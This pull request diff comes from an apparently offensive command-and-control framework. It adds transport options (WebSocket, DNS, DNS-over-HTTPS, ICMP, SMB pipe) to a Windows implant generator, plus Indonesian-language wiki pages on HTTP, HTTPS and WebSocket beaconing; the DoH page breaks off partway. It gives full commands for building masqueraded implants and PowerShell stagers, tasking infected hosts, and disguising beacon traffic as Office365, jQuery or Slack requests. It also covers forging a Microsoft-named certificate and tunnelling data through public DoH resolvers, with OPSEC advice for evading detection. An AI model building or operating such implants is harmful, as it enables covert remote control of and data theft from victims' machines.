### PR TITLE
feat: add per-transport CLI flags to generator + 6 transport wiki pages

### DIFF
--- a/cmd/generate/build.go
+++ b/cmd/generate/build.go
@@ -149,6 +149,20 @@ var stagelessCmd = &cobra.Command{
     --c2 https://c2.example.com \
     --key MyAESKey \
     --profile profiles/stealth.yaml \
+    --output bin/implant.exe
+
+  # WebSocket transport (server must be started with --ws):
+  taburtuai-generate stageless --c2 https://c2.example.com --key K \
+    --transport ws --output bin/implant.exe
+
+  # DNS-over-HTTPS transport (requires authoritative DNS zone for --doh-domain):
+  taburtuai-generate stageless --c2 https://c2.example.com --key K \
+    --transport doh --doh-domain tunnel.example.com --doh-provider cloudflare \
+    --output bin/implant.exe
+
+  # SMB pipe transport (requires cmd/listener/smb_relay running on --smb-relay host):
+  taburtuai-generate stageless --c2 https://c2.example.com --key K \
+    --transport smb --smb-relay 192.168.1.5 --smb-pipe svcctl \
     --output bin/implant.exe`,
 	RunE: runStageless,
 }
@@ -183,6 +197,16 @@ stagelessCmd.Flags().Int("interval", 30, "Beacon interval (seconds)")
 	stagelessCmd.Flags().String("masq-internal", "", "PE version-resource InternalName (default: masq-orig minus .exe)")
 	stagelessCmd.Flags().String("masq-ver", "", "PE version string, e.g. 10.0.19041.1")
 	stagelessCmd.Flags().Bool("insecure-tls", false, "Skip TLS cert verification in agent (for self-signed C2 certs)")
+	stagelessCmd.Flags().String("cert-pin", "", "Pin server TLS leaf cert by SHA-256 hex fingerprint (HTTPS/WSS only)")
+	// ── Transport selection (Go implant only) ─────────────────────────────────
+	stagelessCmd.Flags().String("transport", "http", "Agent transport: http|https|ws|doh|dns|icmp|smb")
+	stagelessCmd.Flags().String("ws-url", "", "WebSocket URL (default: derived from --c2 with ws/wss scheme)")
+	stagelessCmd.Flags().String("dns-domain", "", "DNS transport: C2-controlled zone (e.g. tunnel.example.com)")
+	stagelessCmd.Flags().String("dns-server", "", "DNS transport: authoritative DNS server host:port (default: --c2 host + :5353)")
+	stagelessCmd.Flags().String("doh-domain", "", "DoH transport: C2-controlled zone")
+	stagelessCmd.Flags().String("doh-provider", "cloudflare", "DoH resolver: cloudflare|google")
+	stagelessCmd.Flags().String("smb-relay", "", "SMB transport: relay host or IP")
+	stagelessCmd.Flags().String("smb-pipe", "svcctl", "SMB transport: pipe name")
 	_ = stagelessCmd.MarkFlagRequired("c2")
 	_ = stagelessCmd.MarkFlagRequired("key")
 }
@@ -216,6 +240,37 @@ func runStageless(cmd *cobra.Command, _ []string) error {
 	masqInternal, _ := cmd.Flags().GetString("masq-internal")
 	masqVer, _ := cmd.Flags().GetString("masq-ver")
 	insecureTLS, _ := cmd.Flags().GetBool("insecure-tls")
+	certPin, _ := cmd.Flags().GetString("cert-pin")
+	// Transport flags (Go implant only — C implant ignores these for now)
+	transport, _ := cmd.Flags().GetString("transport")
+	wsURL, _ := cmd.Flags().GetString("ws-url")
+	dnsDomain, _ := cmd.Flags().GetString("dns-domain")
+	dnsServer, _ := cmd.Flags().GetString("dns-server")
+	dohDomain, _ := cmd.Flags().GetString("doh-domain")
+	dohProvider, _ := cmd.Flags().GetString("doh-provider")
+	smbRelay, _ := cmd.Flags().GetString("smb-relay")
+	smbPipe, _ := cmd.Flags().GetString("smb-pipe")
+
+	// Per-transport required-flag validation
+	switch transport {
+	case "ws":
+		// wsURL optional — derived from --c2 if empty
+	case "dns":
+		if dnsDomain == "" {
+			return fmt.Errorf("--dns-domain is required when --transport=dns")
+		}
+	case "doh":
+		if dohDomain == "" {
+			return fmt.Errorf("--doh-domain is required when --transport=doh")
+		}
+	case "smb":
+		if smbRelay == "" {
+			return fmt.Errorf("--smb-relay is required when --transport=smb")
+		}
+	case "icmp":
+		fmt.Fprintln(os.Stderr, "[!] WARNING: ICMP server-side listener not yet implemented (ROADMAP 11.4).")
+		fmt.Fprintln(os.Stderr, "    Agent will beacon via ICMP echo but receive no replies until cmd/listener/icmp_listener.go ships.")
+	}
 
 	var profile *OpsecProfile
 	if profilePath != "" {
@@ -372,6 +427,15 @@ func runStageless(cmd *cobra.Command, _ []string) error {
 		Compress:     compress,
 		Profile:      profile,
 		InsecureTLS:  insecureTLS,
+		CertPin:      certPin,
+		Transport:    transport,
+		WSServerURL:  wsURL,
+		DNSDomain:    dnsDomain,
+		DNSServer:    dnsServer,
+		DOHDomain:    dohDomain,
+		DOHProvider:  dohProvider,
+		SMBRelay:     smbRelay,
+		SMBPipe:      smbPipe,
 	})
 	if err != nil {
 		return err

--- a/cmd/generate/generator.go
+++ b/cmd/generate/generator.go
@@ -77,6 +77,26 @@ type Config struct {
 
 	Profile     *OpsecProfile
 	InsecureTLS bool // bake InsecureSkipVerify=true into agent (for self-signed C2 certs)
+	CertPin     string // SHA-256 hex fingerprint of expected server TLS leaf cert (HTTPS only)
+
+	// Transport selection (default = http when empty).
+	// Valid values: http | https | ws | doh | dns | icmp | smb
+	Transport string
+
+	// WebSocket transport
+	WSServerURL string // ws:// or wss:// URL; defaults to ServerURL with scheme rewritten
+
+	// DNS transport (native, agent → authoritative DNS server)
+	DNSDomain string // C2-controlled zone (e.g. tunnel.example.com)
+	DNSServer string // host:port of authoritative DNS server (default: ServerURL host + :5353)
+
+	// DNS-over-HTTPS transport (agent → public DoH resolver → authoritative zone)
+	DOHDomain   string // C2-controlled zone (e.g. tunnel.example.com)
+	DOHProvider string // "cloudflare" | "google" (default: cloudflare)
+
+	// SMB named-pipe transport (agent → relay host)
+	SMBRelay string // relay host or IP (e.g. 192.168.1.5)
+	SMBPipe  string // pipe name (default: "svcctl")
 }
 
 // Result holds the outcome of a build.
@@ -152,6 +172,57 @@ func (g *Generator) Build(cfg *Config) (*Result, error) {
 
 	if cfg.InsecureTLS {
 		ldflags += " -X main.defaultInsecureTLS=true"
+	}
+	if cfg.CertPin != "" {
+		ldflags += " -X main.defaultCertPin=" + cfg.CertPin
+	}
+
+	// Transport selection — agent main.go reads `defaultTransport` and
+	// transport-specific *Server*/Domain/Pipe build vars to choose its loop.
+	// "http" (or empty) is the default and needs no extra ldflags.
+	switch cfg.Transport {
+	case "", "http", "https":
+		// HTTP/HTTPS: agent uses ServerURL directly; no extra vars needed.
+		// (HTTPS is selected at build time by giving an https:// ServerURL.)
+		if cfg.Transport != "" {
+			ldflags += " -X main.defaultTransport=" + cfg.Transport
+		}
+	case "ws":
+		ldflags += " -X main.defaultTransport=ws"
+		if cfg.WSServerURL != "" {
+			ldflags += " -X main.defaultWSServerURL=" + cfg.WSServerURL
+		}
+	case "dns":
+		ldflags += " -X main.defaultTransport=dns"
+		if cfg.DNSDomain != "" {
+			ldflags += " -X main.defaultDNSDomain=" + cfg.DNSDomain
+		}
+		if cfg.DNSServer != "" {
+			ldflags += " -X main.defaultDNSServer=" + cfg.DNSServer
+		}
+	case "doh":
+		ldflags += " -X main.defaultTransport=doh"
+		if cfg.DOHDomain != "" {
+			ldflags += " -X main.defaultDOHDomain=" + cfg.DOHDomain
+		}
+		if cfg.DOHProvider != "" {
+			ldflags += " -X main.defaultDOHProvider=" + cfg.DOHProvider
+		}
+	case "icmp":
+		ldflags += " -X main.defaultTransport=icmp"
+		// NOTE: ICMP server-side listener (cmd/listener/icmp_listener.go) is
+		// not yet implemented — see ROADMAP 11.4. Agent will beacon but
+		// receive no replies until that ships.
+	case "smb":
+		ldflags += " -X main.defaultTransport=smb"
+		if cfg.SMBRelay != "" {
+			ldflags += " -X main.defaultSMBRelay=" + cfg.SMBRelay
+		}
+		if cfg.SMBPipe != "" {
+			ldflags += " -X main.defaultSMBPipe=" + cfg.SMBPipe
+		}
+	default:
+		return nil, fmt.Errorf("unknown transport %q (want: http|https|ws|doh|dns|icmp|smb)", cfg.Transport)
 	}
 
 	if cfg.StripSyms {

--- a/pkg/transport/icmp_windows.go
+++ b/pkg/transport/icmp_windows.go
@@ -2,6 +2,18 @@
 
 // ICMP C2 transport — Windows implementation.
 //
+// ⚠ STATUS: AGENT-SIDE ONLY. The matching server listener is NOT YET
+// IMPLEMENTED. See ROADMAP item 11.4. An agent built with
+// `--transport icmp` will emit echo requests carrying framed C2 data, but
+// will receive no command replies until cmd/listener/icmp_listener.go is
+// written. Use HTTP/HTTPS/WS for end-to-end testing in the meantime.
+//
+// TODO(roadmap-11.4): implement cmd/listener/icmp_listener.go (raw socket
+// listener that inspects incoming echo requests, demuxes by source IP,
+// queues commands, and responds via crafted echo replies). When it lands,
+// remove this notice and wire the build into cmd/server/main.go behind
+// a `--icmp` flag.
+//
 // Uses IcmpSendEcho2 (iphlpapi.dll) which does NOT require a raw socket or
 // elevated privileges when the destination is reachable, because Windows
 // provides a privileged ICMP handle via IcmpCreateFile.
@@ -15,9 +27,9 @@
 //     Same framing in the reply data field.
 //     C2 server must run a raw-socket listener that inspects echo requests
 //     and crafts echo replies with command payloads embedded.
-//     See cmd/listener/icmp_listener.go (separate server-side component).
+//     See cmd/listener/icmp_listener.go (planned — not yet implemented).
 //
-// Requires: Requires IcmpSendEcho2 available on Windows XP+ (no raw socket needed).
+// Requires: IcmpSendEcho2 available on Windows XP+ (no raw socket needed).
 package transport
 
 import (

--- a/wiki/22-transport-http.md
+++ b/wiki/22-transport-http.md
@@ -1,0 +1,171 @@
+# Transport: HTTP
+
+Default transport. Agent beacons over plain HTTP POST/GET to the team server. Easiest to set up; no extra flags needed on either side.
+
+---
+
+## Kapan Dipakai
+
+- Lab / testing awal — tidak perlu sertifikat
+- Target environment yang block outbound HTTPS (jarang, tapi ada)
+- Ketika kamu pasang redirector/reverse proxy di depan server yang handle TLS
+
+> **OPSEC note**: traffic plaintext, terlihat jelas di network monitoring. Jangan pakai di engagement nyata tanpa redirector atau domain fronting.
+
+---
+
+## Arsitektur
+
+```
+[Agent] --HTTP POST/GET--> [Team Server :8080]
+```
+
+Wire format: `POST` body berisi JSON `{ "agent_id": "...", "encrypted_payload": "<AES-GCM base64>" }`. Application-layer encryption (AES-256-GCM + ECDH session key) tetap jalan walaupun transport plaintext.
+
+---
+
+## Step 1 — Start Server (HTTP)
+
+```bash
+# Minimal
+ENCRYPTION_KEY=MySecretKey32Chars00000000000000 go run ./cmd/server
+
+# Full options
+ENCRYPTION_KEY=MySecretKey32Chars00000000000000 \
+  go run ./cmd/server \
+  -port 8080 \
+  -host 0.0.0.0 \
+  -profile default \
+  -log-level INFO \
+  -log-dir ./logs \
+  -db ./data/taburtuai.db
+```
+
+| Flag | Env | Default | Keterangan |
+|------|-----|---------|-----------|
+| `-port` | `$PORT` | `8080` | Port HTTP listener |
+| `-host` | `$HOST` | `0.0.0.0` | Bind address |
+| `-profile` | `$PROFILE` | `default` | Malleable HTTP profile |
+| `-log-level` | `$LOG_LEVEL` | `INFO` | DEBUG / INFO / WARN / ERROR |
+| `-db` | `$DB_PATH` | `./data/taburtuai.db` | SQLite database path |
+
+**Expected log saat server ready:**
+```
+  [✓]  ready  ·  listening on 0.0.0.0:8080
+```
+
+---
+
+## Step 2 — Generate Agent (HTTP)
+
+HTTP adalah default — tidak perlu `--transport` flag.
+
+```bash
+# Default (HTTP)
+go run ./cmd/generate/ stageless \
+  --c2 http://192.168.1.10:8080 \
+  --key MySecretKey32Chars00000000000000 \
+  --interval 30 \
+  --jitter 20 \
+  --output bin/agent_http.exe
+
+# Dengan malleable HTTP profile (traffic mirip jQuery CDN)
+go run ./cmd/generate/ stageless \
+  --c2 http://192.168.1.10:8080 \
+  --key MySecretKey32Chars00000000000000 \
+  --c2-profile jquery \
+  --output bin/agent_jquery.exe
+```
+
+**Expected output:**
+```
+[*] Compiling agent (amd64/windows)...
+[+] Stageless implant : bin/agent_http.exe
+    Size              : 11234 KB
+    SHA256            : ...
+    Build time        : 2.4s
+```
+
+---
+
+## Step 3 — Verify Checkin
+
+Jalankan agent di target (Windows), lalu pantau server log:
+
+```
+[+] Agent checkin: <agent-id>  192.168.1.50  DESKTOP-ABC  user  windows/amd64
+```
+
+Atau query via operator console:
+```bash
+go run ./cmd/operator/ agents list
+```
+
+---
+
+## Step 4 — Verify Tasking
+
+```bash
+# Kirim perintah via operator console
+go run ./cmd/operator/ \
+  --server http://192.168.1.10:8080 \
+  --key MySecretKey32Chars00000000000000 \
+  exec --agent <agent-id> --cmd "whoami"
+
+# Lihat hasil
+go run ./cmd/operator/ \
+  --server http://192.168.1.10:8080 \
+  --key MySecretKey32Chars00000000000000 \
+  results --agent <agent-id>
+```
+
+---
+
+## Step 5 — Verify Encryption
+
+### Via Wireshark
+
+Filter:
+```
+tcp.port == 8080 && http
+```
+
+Di packet `POST /api/v1/checkin`, expand **HTTP > Line-based text data**. Body harus terlihat seperti:
+```json
+{"agent_id":"a1b2c3...","encrypted_payload":"<base64-random>"}
+```
+
+Field `encrypted_payload` harus **tidak terbaca** (random base64) — bukan JSON polos. Itu konfirmasi AES-GCM bekerja.
+
+### Via tcpdump (server side)
+
+```bash
+sudo tcpdump -i eth0 -A port 8080 2>/dev/null | grep -v "^--$" | grep encrypted_payload
+```
+
+Harus tampil: `"encrypted_payload":"...base64..."` dengan konten acak, **bukan** cleartext.
+
+---
+
+## Endpoint Paths per Malleable Profile
+
+| Profile | Checkin | Poll | Result |
+|---------|---------|------|--------|
+| `default` | `POST /api/v1/checkin` | `GET /api/v1/command/{id}/next` | `POST /api/v1/command/result` |
+| `office365` | `POST /autodiscover/autodiscover.xml` | `GET /ews/exchange.asmx/{id}` | `POST /mapi/emsmdb` |
+| `cdn` | `POST /cdn-cgi/rum` | `GET /cdn-cgi/challenge-platform/h/b/flow/{id}` | `POST /cdn-cgi/zaraz/t` |
+| `jquery` | `POST /assets/js/jquery-3.7.1.min.js` | `GET /assets/js/bundle.{id}.min.js` | `POST /assets/js/vendors~main.chunk.js` |
+| `slack` | `POST /api/users.identity` | `GET /api/conversations.history/{id}` | `POST /api/chat.postMessage` |
+| `ocsp` | `POST /ocsp` | `GET /ocsp/{id}` | `POST /crl/root.crl` |
+
+---
+
+## Troubleshooting
+
+| Symptom | Penyebab | Solusi |
+|---------|----------|--------|
+| Agent tidak muncul di console setelah dijalankan | `--c2` URL salah atau port tidak reachable | Cek koneksi: `curl http://<server>:8080/api/v1/checkin` dari target |
+| Server log: `"http listener error"` | Port sudah dipakai proses lain | Ganti port dengan `-port 9090` |
+| Server log: `400 Bad Request` terus | `--key` agent tidak match `ENCRYPTION_KEY` server | Pastikan key sama persis (case-sensitive) |
+| Agent crash silent | Agent build tanpa `-c2` / `-key` (binary inoperable) | Rebuild dengan flag yang benar |
+| Traffic tidak terenkripsi di Wireshark | Agent lama build tanpa AES config | Rebuild agent |

--- a/wiki/23-transport-https.md
+++ b/wiki/23-transport-https.md
@@ -1,0 +1,212 @@
+# Transport: HTTPS
+
+Agent beacons over TLS-encrypted HTTP. Direkomendasikan untuk semua engagement — traffic terlihat seperti HTTPS web normal, dan ada lapisan TLS di atas application-level AES-GCM encryption.
+
+---
+
+## Kapan Dipakai
+
+- **Default untuk semua engagement nyata** — traffic terenkripsi dua lapis
+- Ketika target environment hanya allow outbound port 443
+- Ketika kamu butuh cert pinning untuk memastikan agent hanya bicara ke server kamu
+- Kombinasi dengan domain fronting (lihat [wiki/19-opsec-guide.md](19-opsec-guide.md))
+
+---
+
+## Arsitektur
+
+```
+[Agent] --HTTPS POST/GET (TLS)--> [Team Server :8443]
+                                   └── auto-redirect :8080 → :8443
+```
+
+Double encryption:
+1. **TLS** — transport layer, dibuka di server
+2. **AES-256-GCM + ECDH** — application layer, key di-negotiate saat checkin
+
+---
+
+## Step 1 — Siapkan TLS Cert
+
+### Opsi A: Auto-generate (self-signed) — cepat untuk lab
+
+Server otomatis generate self-signed cert saat `--tls` dinyalakan. Agent harus di-build dengan `--insecure-tls`.
+
+### Opsi B: Cert sendiri (production)
+
+```bash
+# Generate self-signed cert manual (pakai untuk control output)
+openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt \
+  -days 365 -nodes \
+  -subj "/C=US/O=Microsoft Corporation/CN=teams.microsoft.com"
+
+# Ambil SHA-256 fingerprint untuk cert pinning
+openssl x509 -in server.crt -noout -fingerprint -sha256 \
+  | sed 's/://g' | awk -F= '{print tolower($2)}'
+```
+
+Simpan output fingerprint — dipakai di `--cert-pin` saat generate agent.
+
+### Opsi C: Let's Encrypt (domain publik)
+
+```bash
+certbot certonly --standalone -d c2.example.com
+# Cert di: /etc/letsencrypt/live/c2.example.com/fullchain.pem
+# Key  di: /etc/letsencrypt/live/c2.example.com/privkey.pem
+```
+
+---
+
+## Step 2 — Start Server (HTTPS)
+
+```bash
+# Auto-generated self-signed cert
+ENCRYPTION_KEY=MySecretKey32Chars00000000000000 \
+  go run ./cmd/server \
+  --tls \
+  --tls-port 8443 \
+  -port 8080
+
+# Cert sendiri
+ENCRYPTION_KEY=MySecretKey32Chars00000000000000 \
+  go run ./cmd/server \
+  --tls \
+  --tls-cert /path/to/server.crt \
+  --tls-key /path/to/server.key \
+  --tls-port 8443 \
+  -port 8080 \
+  -profile office365
+```
+
+| Flag | Env | Default | Keterangan |
+|------|-----|---------|-----------|
+| `--tls` | `$TLS_ENABLED` | `false` | Aktifkan HTTPS listener |
+| `--tls-port` | `$TLS_PORT` | `8443` | Port HTTPS |
+| `--tls-cert` | `$TLS_CERT` | auto-generate | Path ke cert file (.crt/.pem) |
+| `--tls-key` | `$TLS_KEY` | auto-generate | Path ke private key |
+| `-port` | `$PORT` | `8080` | Port HTTP (redirect ke HTTPS) |
+
+**Expected log:**
+```
+  [✓]  ready  ·  HTTPS on 0.0.0.0:8443  (cert: auto-generated)
+       HTTP  :8080 → redirect to HTTPS
+```
+
+---
+
+## Step 3 — Generate Agent (HTTPS)
+
+```bash
+# Self-signed cert (skip TLS verify)
+go run ./cmd/generate/ stageless \
+  --c2 https://192.168.1.10:8443 \
+  --key MySecretKey32Chars00000000000000 \
+  --insecure-tls \
+  --output bin/agent_https.exe
+
+# Dengan cert pinning (recommended — agent tolak cert lain)
+go run ./cmd/generate/ stageless \
+  --c2 https://c2.example.com \
+  --key MySecretKey32Chars00000000000000 \
+  --cert-pin a1b2c3d4e5f6...  \
+  --output bin/agent_https_pinned.exe
+
+# Dengan domain fronting
+go run ./cmd/generate/ stageless \
+  --c2 https://c2.example.com \
+  --key MySecretKey32Chars00000000000000 \
+  --insecure-tls \
+  --c2-profile office365 \
+  --output bin/agent_o365.exe
+```
+
+| Flag | Keterangan |
+|------|-----------|
+| `--insecure-tls` | Skip verifikasi CA chain (untuk self-signed cert) |
+| `--cert-pin <sha256>` | Pin cert fingerprint — tolak semua cert lain |
+| `--c2-profile` | Malleable HTTP profile (lihat tabel di wiki/22) |
+
+> **Catatan**: `--insecure-tls` dan `--cert-pin` saling eksklusif secara logika. Pakai `--cert-pin` untuk production (lebih aman), `--insecure-tls` untuk lab.
+
+---
+
+## Step 4 — Verify Checkin
+
+Sama seperti HTTP. Log server:
+```
+[+] Agent checkin: <agent-id>  192.168.1.50  DESKTOP-ABC  user  windows/amd64
+```
+
+---
+
+## Step 5 — Verify Encryption
+
+### Wireshark — konfirmasi TLS handshake
+
+Filter:
+```
+tcp.port == 8443
+```
+
+Yang harus terlihat:
+1. `Client Hello` → `Server Hello` → `Certificate` → `Finished` (TLS handshake)
+2. `Application Data` — isi terenkripsi, tidak bisa dibaca
+
+Untuk konfirmasi cert:
+```
+tls.handshake.type == 11
+```
+Klik packet Certificate → expand `TLS > Handshake Protocol > Certificate > Certificate` → lihat Subject dan validity.
+
+### Verifikasi cert pinning
+
+```bash
+# Cek fingerprint cert yang sedang dipakai server
+echo | openssl s_client -connect 192.168.1.10:8443 2>/dev/null \
+  | openssl x509 -noout -fingerprint -sha256 \
+  | sed 's/://g' | awk -F= '{print tolower($2)}'
+```
+
+Output harus sama dengan nilai `--cert-pin` yang di-bake ke agent.
+
+### Verifikasi double-encryption
+
+Jika kamu decrypt TLS session (dengan server private key di Wireshark SSLKEYLOGFILE), inner HTTP body harus tetap acak:
+```json
+{"agent_id":"...","encrypted_payload":"<base64-tidak-terbaca>"}
+```
+
+---
+
+## Step 6 — Generate Stager HTTPS
+
+```bash
+# Stager download via HTTPS
+go run ./cmd/generate/ stager \
+  --c2 https://c2.example.com \
+  --token <upload-token> \
+  --key MySecretKey32Chars00000000000000 \
+  --format ps1 \
+  --output stager_https.ps1
+```
+
+Upload payload dulu:
+```bash
+go run ./cmd/generate/ upload bin/agent_https.exe \
+  --server https://c2.example.com \
+  --api-key <api-key> \
+  --insecure
+```
+
+---
+
+## Troubleshooting
+
+| Symptom | Penyebab | Solusi |
+|---------|----------|--------|
+| `x509: certificate signed by unknown authority` | Pakai self-signed tanpa `--insecure-tls` | Rebuild agent dengan `--insecure-tls` |
+| `x509: certificate is valid for X, not Y` | CN/SAN cert tidak match hostname di `--c2` | Gunakan IP di `--c2` atau rebuild cert dengan SAN yang benar |
+| Cert pin mismatch | Server cert berubah (renewal) atau agent salah fingerprint | Ambil fingerprint baru, rebuild agent |
+| `TLS handshake error` di server log | Agent pakai TLS versi lama atau cipher suite tidak support | Cek Go version server vs. agent |
+| HTTP redirect loop | `-port` dan `--tls-port` sama | Gunakan port berbeda (8080 + 8443) |
+| Port 443 permission denied | Butuh root untuk bind port < 1024 | Pakai `setcap cap_net_bind_service=+ep` atau DNAT iptables: `iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8443` |

--- a/wiki/24-transport-ws.md
+++ b/wiki/24-transport-ws.md
@@ -1,0 +1,219 @@
+# Transport: WebSocket (WS/WSS)
+
+Agent membuka koneksi WebSocket persistent ke server. Berbeda dengan HTTP/HTTPS yang polling-based, WebSocket memungkinkan server **push command langsung** ke agent tanpa menunggu beacon interval berikutnya — latency command delivery mendekati real-time.
+
+---
+
+## Kapan Dipakai
+
+- **Engagement yang butuh interactive shell feel** — command langsung masuk tanpa nunggu beacon
+- Target environment yang allow WebSocket (port 80/443 via Upgrade header)
+- Ketika beacon interval panjang (stealth mode) tapi tetap butuh responsivitas saat interact
+- Kombinasi dengan `--profile` untuk menyamarkan handshake sebagai legitimate WS traffic
+
+> **OPSEC note**: koneksi persistent lebih mudah dideteksi oleh anomaly detection ("koneksi ke IP eksternal yang tidak pernah putus selama 8 jam"). Mitigasi: pakai `--ws-url wss://` (TLS), pakai domain fronting, set reconnect interval normal.
+
+---
+
+## Arsitektur
+
+```
+[Agent] --WS persistent conn--> [Team Server :8081/ws]
+          ^                              |
+          |                             | push command
+          +-------- command +-----------+
+               (server-initiated)
+
+[Agent] --HTTP/HTTPS--> [:8080/:8443]  (REST API — masih aktif)
+```
+
+Server `--ws` berjalan **paralel** dengan HTTP listener. Agent yang pakai WS transport hanya connect ke WS endpoint; REST API tetap tersedia untuk operator console.
+
+---
+
+## Step 1 — Start Server (WS)
+
+```bash
+# WS over plain TCP (lab)
+ENCRYPTION_KEY=MySecretKey32Chars00000000000000 \
+  go run ./cmd/server \
+  --ws \
+  --ws-port 8081 \
+  -port 8080
+
+# WSS (WebSocket over TLS) — gabung dengan --tls
+ENCRYPTION_KEY=MySecretKey32Chars00000000000000 \
+  go run ./cmd/server \
+  --ws \
+  --ws-port 8081 \
+  --tls \
+  --tls-port 8443 \
+  -port 8080
+```
+
+| Flag | Env | Default | Keterangan |
+|------|-----|---------|-----------|
+| `--ws` | `$WS_ENABLED` | `false` | Aktifkan WebSocket listener |
+| `--ws-port` | `$WS_PORT` | `8081` | Port WS listener |
+
+**Expected log:**
+```
+  [✓]  WebSocket listener  ·  ws://0.0.0.0:8081/ws
+  [✓]  ready  ·  listening on 0.0.0.0:8080
+```
+
+---
+
+## Step 2 — Generate Agent (WS)
+
+```bash
+# Plain WS (ws://)
+go run ./cmd/generate/ stageless \
+  --c2 http://192.168.1.10:8080 \
+  --key MySecretKey32Chars00000000000000 \
+  --transport ws \
+  --ws-url ws://192.168.1.10:8081/ws \
+  --output bin/agent_ws.exe
+
+# WSS (wss://) — TLS WebSocket
+go run ./cmd/generate/ stageless \
+  --c2 https://c2.example.com \
+  --key MySecretKey32Chars00000000000000 \
+  --transport ws \
+  --ws-url wss://c2.example.com:8081/ws \
+  --insecure-tls \
+  --output bin/agent_wss.exe
+
+# WSS dengan cert pin
+go run ./cmd/generate/ stageless \
+  --c2 https://c2.example.com \
+  --key MySecretKey32Chars00000000000000 \
+  --transport ws \
+  --ws-url wss://c2.example.com:8081/ws \
+  --cert-pin a1b2c3d4e5f6... \
+  --output bin/agent_wss_pinned.exe
+```
+
+| Flag | Keterangan |
+|------|-----------|
+| `--transport ws` | Pilih WS transport |
+| `--ws-url <url>` | Endpoint WebSocket. Jika dikosongkan, agent derive dari `--c2` URL dengan ganti scheme (`http→ws`, `https→wss`). Tapi explicit lebih aman karena port WS (8081) beda dengan HTTP (8080). |
+
+---
+
+## Step 3 — Verify Checkin
+
+Saat agent connect, server log:
+```
+[+] WebSocket client connected: <remote-ip>
+[+] Agent checkin (WS): <agent-id>  DESKTOP-ABC  user
+```
+
+Agent mengirim pesan pertama (type `checkin`) sebelum menerima command apapun. Server respond dengan `noop` atau langsung push command jika ada yang antri.
+
+---
+
+## Step 4 — Verify Push Tasking (beda dari HTTP)
+
+Ini perbedaan utama WS vs HTTP. Test dengan:
+
+```bash
+# Di terminal 1: jalankan agent dan pantau
+# Di terminal 2: kirim command via operator console SEGERA
+go run ./cmd/operator/ \
+  --server http://192.168.1.10:8080 \
+  --key MySecretKey32Chars00000000000000 \
+  exec --agent <agent-id> --cmd "whoami"
+```
+
+Command harus **langsung diterima agent** (< 1 detik), bukan nunggu beacon interval berikutnya. Ini konfirmasi push tasking berfungsi.
+
+---
+
+## Step 5 — Verify Koneksi Persistent & Reconnect
+
+1. Jalankan agent
+2. Tunggu checkin sukses
+3. Restart server (kill + rerun)
+4. Pantau agent — harus auto-reconnect dalam ~5 detik dan re-checkin
+
+Log server saat reconnect:
+```
+[+] WebSocket client connected: <remote-ip>
+[+] Agent re-checkin (WS): <agent-id>
+```
+
+---
+
+## Step 6 — Verify Encryption via Wireshark
+
+### Plain WS (ws://)
+
+Filter:
+```
+tcp.port == 8081 && websocket
+```
+
+Lihat WebSocket frame (TCP stream) → payload berisi JSON envelope:
+```json
+{"type":"checkin","id":"<agent-id>","data":"<base64-ciphertext>"}
+```
+
+Field `data` harus random base64 (AES-GCM). Jika terlihat JSON plaintext di dalam, sesuatu salah dengan encryption.
+
+### WSS (wss://)
+
+Filter:
+```
+tcp.port == 8081 && tls
+```
+
+Semua frame terenkripsi TLS. Untuk inspect WS frame, butuh TLS key (SSLKEYLOGFILE). Bahkan dengan TLS decrypted, `data` field tetap base64 (double encrypted).
+
+### Inspect WebSocket Upgrade
+
+```
+http.upgrade == "websocket"
+```
+
+Request header harus berisi:
+```
+Upgrade: websocket
+Connection: Upgrade
+Sec-WebSocket-Key: <random base64>
+```
+
+---
+
+## Wire Format Detail
+
+Semua pesan adalah JSON envelope:
+
+**Agent → Server (checkin):**
+```json
+{"type": "checkin", "id": "<agent-id>", "data": <encrypted-JSON>}
+```
+
+**Server → Agent (noop / push command):**
+```json
+{"type": "noop",    "id": "", "data": null}
+{"type": "command", "id": "<cmd-id>", "data": <encrypted-cmd>}
+```
+
+**Agent → Server (result):**
+```json
+{"type": "result", "id": "<agent-id>", "data": <encrypted-result>}
+```
+
+---
+
+## Troubleshooting
+
+| Symptom | Penyebab | Solusi |
+|---------|----------|--------|
+| Agent tidak connect, server tidak log WS | `--ws` flag lupa di server atau port berbeda | Cek `--ws --ws-port 8081` di server; cek `--ws-url` di agent |
+| Agent checkin di HTTP listener, bukan WS | `--transport ws` tidak di-set di agent | Rebuild dengan `--transport ws` |
+| `websocket: close 1006` langsung setelah connect | Server reject karena pesan pertama bukan `type=checkin` | Bug di agent transport, cek `pkg/transport/ws.go` |
+| Command tidak ter-push (agent dapat command lambat) | Agent pakai HTTP transport, bukan WS | Cek binary: `strings agent.exe \| grep "defaultTransport"` |
+| Reconnect loop terus-menerus | Server cert/key salah (WSS) atau `--ws-url` salah | Cek WSS handshake di Wireshark; pastikan `--ws-url` resolve ke server |
+| `wsURL` kosong di agent (ws._other.go) | `--ws-url` tidak di-set saat build | Rebuild dengan `--ws-url ws://<ip>:8081/ws` explicit |

--- a/wiki/25-transport-doh.md
+++ b/wiki/25-transport-doh.md
@@ -1,0 +1,263 @@
+# Transport: DNS-over-HTTPS (DoH)
+
+Agent mengirim data C2 yang diencode sebagai DNS TXT query, dikirim ke **public DoH resolver** (Cloudflare atau Google), yang meneruskannya ke **authoritative DNS zone** yang kamu kontrol. Server C2 berjalan sebagai authoritative DNS untuk zone tersebut dan menjawab dengan command yang diencode.
+
+---
+
+## Kapan Dipakai
+
+- Target environment yang block semua outbound kecuali DNS (port 53/UDP) atau HTTPS ke Cloudflare (port 443)
+- Network yang melakukan deep packet inspection — DoH terlihat seperti HTTPS request ke `1.1.1.1` atau `8.8.8.8`
+- Exfiltration pelan di environment sangat restricted
+
+> **OPSEC note**: DoH tidak terlihat seperti custom protocol — traffic ke `1.1.1.1:443` adalah hal umum. Kelemahannya: bandwidth sangat terbatas (~200 bytes per query), dan latency tinggi (beberapa detik per command). Bukan untuk interactive session, tapi bagus untuk async tasking.
+
+---
+
+## Arsitektur
+
+```
+[Agent] --HTTPS POST--> [Cloudflare/Google DoH :443]
+                                    |
+                          (resolve TXT query)
+                                    |
+                                    v
+                        [Authoritative DNS Server (C2)]
+                               :5353 UDP
+```
+
+Data flow:
+1. Agent encode payload sebagai DNS label (base32)
+2. Agent query `<encoded-data>.tunnel.example.com` type TXT via Cloudflare DoH
+3. Cloudflare forward ke authoritative NS untuk `tunnel.example.com` (server C2 kamu)
+4. Server decode data, proses, respond dengan command sebagai TXT record (base32)
+5. Cloudflare return TXT response ke agent
+6. Agent decode TXT response
+
